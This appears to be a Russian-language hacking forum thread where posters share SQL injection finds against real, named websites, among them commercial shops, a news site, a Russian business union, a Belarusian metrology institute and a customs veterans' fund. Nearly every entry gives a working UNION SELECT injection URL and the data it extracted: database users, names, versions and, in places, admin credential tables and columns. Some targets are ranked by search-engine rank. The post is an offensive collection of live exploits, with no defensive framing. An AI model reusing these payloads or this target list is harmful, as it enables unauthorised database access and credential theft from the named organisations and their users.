SQL Инъекции

-----------

Code:

http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,id,user,login,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--

database - [a2748_wrboats]
version - [5.0.75-percona-highperf-b11-log]
user - [[email protected]]
-----------

 

belindust_firm:5.0.26-log:belindust_firm@localhost

 

ecotextile.com PR-5

Code:

http://www.ecotextile.com/news_details.php?id=-10029+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4+--+

Code:

mow01_oldadm@localhost:4.1.22-standard:mow01_oldetn

Таблица admin, колонки user_name, password
Админки не нашел(

 

http://www.exposicaodeartesanato.com.br/detalhe_produto.php?id_produto=-1+union+all+select+1,2,3,4,5,6,7,8,concat_ws(char(58,58),user(),database(),version()),10,11,12,13,14,15,16,17,18,19--

expos_sirius@localhost::expos_exposicao::4.1.22-standard

 

Российский союз промышленников и предпринимателей.
тИЦ: 1400
PR: 6

Code:

Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) 
Dec 16 2008 19:46:53 
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Федеральное государственное учреждение «Научно исследовательский институт — Республиканский исследовательский научно-консультационный центр экспертизы»
тИЦ: 1700
PR: 5

Code:

VAK:php@localhost:5.0.32-Debian_7etch11-log

 

Code:

http://www.[COLOR=DarkOrange]redorange.de[/COLOR]/public/php/showreel_detail.php?id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--  

Database Version: 5.0.32-Debian_7etch5-log
Database name: usr_web190_1
User name: web190@localhost

 

Code:

http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Версия:

Code:

http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Таблицы:

Code:

http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

Колонки:

Code:

http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns--

Code:

http://www.podlupom.com/index.php?id=-1UNION ALL SELECT 1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.schemata--

 

Microsoft JET Database Engine:

 

Система комплексного раскрытия информации
тИЦ: 2700
PR: 6

Code:

Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005 
Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

 

Code:

http://glinka-capella.ru/news/?id=-1+union+select+1,2,3,concat_ws(0x3a,concat_ws(0x3a,user(),version()),database()),5,6+--+

ТИЦ: 230
PR: 4

User: h_glinka_capella@localhost
Version: 5.0.70-debug-log
Name: glinka_capella_ru

 

mhs.ox.ac.uk pr7, v5

 

User: p5547pla_admin@localhost
Database: p5547pla_planetperplex
Version:81-community

 

Сайт какой-то фирмы:

Риэлторы в Севастополе:

Агрокультуры резюме(с прикольным фильтром):

Французики:

Metropolitan Market

Книжный магазин:

Немцы:

Хомяк какого-то чела:

Японцы:

Такой же японский двиг:

То же самое без фильтра:

Танц клуб:

 

User: [email protected]
Database: freemp3_slovo
Version: 4.1.22-log

 

Sivanandabahamas.org pr4
Sivananda Bahamas Yoga Retreat. )

Code:

[COLOR=SlateGray]http://www.sivanandabahamas.org/index.php?page_id=null+union+select+conc  at_ws(char(32,124,32),version(),user(),database(),@@version_compile_os)+--+[/COLOR]

5.0.27-log | my_yoga_net@localhost | my_yoga_net | redhat-linux-gnu

 

Фонд социальной поддержки сотрудников и ветеранов таможенной службы (Фонд С.В.Т.С.).

Code:

svts:root@localhost:5.0.45

Белорусский Государственный Институт Метрологии.

Code:

belgimby:belgim@localhost:5.1.39

 

Server = Apache/2.0.54 (Fedora)
Version = 5.0.79
Powered by = PHP/5.2.8
Attack Type = SQL Union Injection
Current User = lactuel@localhost
Current Database = lactuel
Supports Union = yes
Union Columns = 19
Url| http://www.lactuel.be/index.php?catId=-106
Vuln: http://www.lactuel.be/index.php?catId=-106+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

 

Офф сайт художницы Джулии Гилмор pr-3

Code:

http://www.juliagilmore.ca/gallery.php?pageid=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13---

andreakr_julia@localhost
5.0.81-community-log
andreakr_julia

 

Shop какой то.

User: root@localhost
Database: whitestripe3
Version: 4.1.22-standard

 

http://www.ssprava.org/index.php?id=-3+union+select+version%28%29,2